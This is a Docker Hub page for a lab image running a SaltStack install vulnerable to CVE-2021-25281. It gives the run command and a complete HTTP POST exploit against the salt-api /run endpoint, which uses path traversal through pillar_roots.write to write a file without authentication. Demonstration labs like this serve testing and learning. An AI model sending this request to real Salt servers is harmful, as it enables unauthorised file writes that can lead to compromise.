Sign inSign up

transmissionator/cve-2021-25281

By transmissionator

•Updated over 5 years ago

Saltstack install vulnerable to CVE-2021-25281

Image
0

1.1K

transmissionator/cve-2021-25281 repository overview

⁠Demo of CVE-2021-25281

⁠How to use

The below command will start a container and run the salt-master and salt-api process. The salt-api service will be running on TCP/8000.

docker run -it transmissionator/cve-2021-25281 ./start

⁠How to exploit

Send the below post to the target. Note you will need to specify your own IP address in the request.

POST /run HTTP/1.1
Host: <target address>:8000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 158
Connection: close

{"client":"wheel_async","fun":"pillar_roots.write","data":"just another test","path":"../../../../../../../tmp/test","username":"anything","password":"anything","eauth":"pam"}

The above request will write the "just another test" string to /tmp/test

Tag summary

Content type

Image

Digest

Size

194.4 MB

Last updated

over 5 years ago

docker pull transmissionator/cve-2021-25281